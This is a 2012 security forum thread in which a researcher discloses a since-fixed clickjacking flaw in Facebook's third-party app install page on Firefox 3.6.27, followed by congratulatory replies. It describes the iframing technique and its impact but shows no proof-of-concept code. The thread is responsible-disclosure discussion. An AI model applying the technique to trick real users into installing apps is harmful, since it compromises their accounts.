3Likes
LinkBack URL
About LinkBacks-
08-01-2012, 12:36 PM #1Security Researcher
![[s] is offline](http://www.garage4hackers.com/images/statusicon/user-offline.png)
![[s] will become famous soon enough](http://www.garage4hackers.com/images/reputation/reputation_pos.png)
![[s]'s Avatar](http://www.garage4hackers.com/avatars/%5Bs%5D.gif?dateline=1333021046 "[s]'s Avatar")
- Join Date
- Nov 2010
- Posts
- 187
- Blog Entries
- 2
- Thanks
- 62
- Thanked 53 Times in 30 Posts
Facebook 3rd Party App Installing Page UI Redressing Vulnerability
#Title: Facebook 3rd Part App Installing Page UI Redressing Vulnerability
Author: Sandeep Kamble
#Business Risk : Medium Risk
#Attack Type: UI Redressing Vulnerability
#Tested Browser: Firefox 3.6.27
#OS: Win 7 / Linux
#Reported Date: July 26 , 2011
Summary
GDay ! Recently , I have submitted UP Redressing Vulnerability to Facebook. Vulnerability enables attacker to install any 3rd Party malicious application into victim Facebook account.
Overview
Clickjacking (UI Redressing )is an exploit in which coding on a malicious website is hidden beneath apparently legitimate buttons.
The strange part of this testing was Facebook 3rd party App installing page already protected for UI redressing vulnerability. The Protection is perfectly working on chrome , safari , IE & New Version of FF .
But Facebook 3rd party App installing page UI redressing failed to work on Firefox 3.6.27.
So in Firefox 3.6.27 i perfectly iframed page & made a perfect POC Facebook team.
Code:Public POC :
Special Thanks to FB team to fix this Bug ! My team G4h
Thanks
[S] - SandeepLast edited by [s]; 08-04-2012 at 10:12 AM.
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
-
-
08-01-2012, 12:45 PM #2Security Researcher
- Join Date
- Jul 2010
- Location
- India
- Posts
- 596
- Blog Entries
- 23
- Thanks
- 279
- Thanked 150 Times in 76 Posts
Good Job, any idea why the protection was not working on FF, some JS failure ? Do you have the previous Code with you to check how facebook dealt with this issue.
Hacking Is a Matter of Time Knowledge and Patience
-
The Following User Says Thank You to fb1h2s For This Useful Post:
[s] (08-04-2012)
-
08-01-2012, 06:28 PM #3Security Researcher
- Join Date
- Nov 2010
- Posts
- 187
- Blog Entries
- 2
- Thanks
- 62
- Thanked 53 Times in 30 Posts
Yes , it was JS Failure ! I have confirmed with Facebook ! I don't have copy of the JS.
Originally Posted by fb1h2s
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
-
08-01-2012, 10:59 PM #4Web Security Consultant
- Join Date
- Jul 2011
- Location
- webr00t
- Posts
- 269
- Blog Entries
- 3
- Thanks
- 24
- Thanked 180 Times in 100 Posts
very nice bug sandeep.... keep it up
-
The Following User Says Thank You to amolnaik4 For This Useful Post:
[s] (08-02-2012)
-
08-02-2012, 04:57 PM #5Security Researcher
- Join Date
- Nov 2010
- Posts
- 187
- Blog Entries
- 2
- Thanks
- 62
- Thanked 53 Times in 30 Posts
Thanks Amol , I remember your Click Jacking Talk of Null Originally Posted by amolnaik4
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
-
08-07-2012, 08:16 PM #6Garage Newcomer
- Join Date
- Sep 2011
- Posts
- 17
- Thanks
- 9
- Thanked 4 Times in 2 Posts
Great find, keep it up bro!! Go G4H!
When the way comes to an end, then change - having changed, you pass through
Reply With QuoteLinkBacks (?)
-
08-13-2012, 01:48 AM
-
08-03-2012, 10:36 PM
-
08-01-2012, 05:47 PM
-
08-01-2012, 05:21 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
Selective Symbolic Execution(S2E)
Today, 08:33 AM in Reverse Engineering and Application Cracking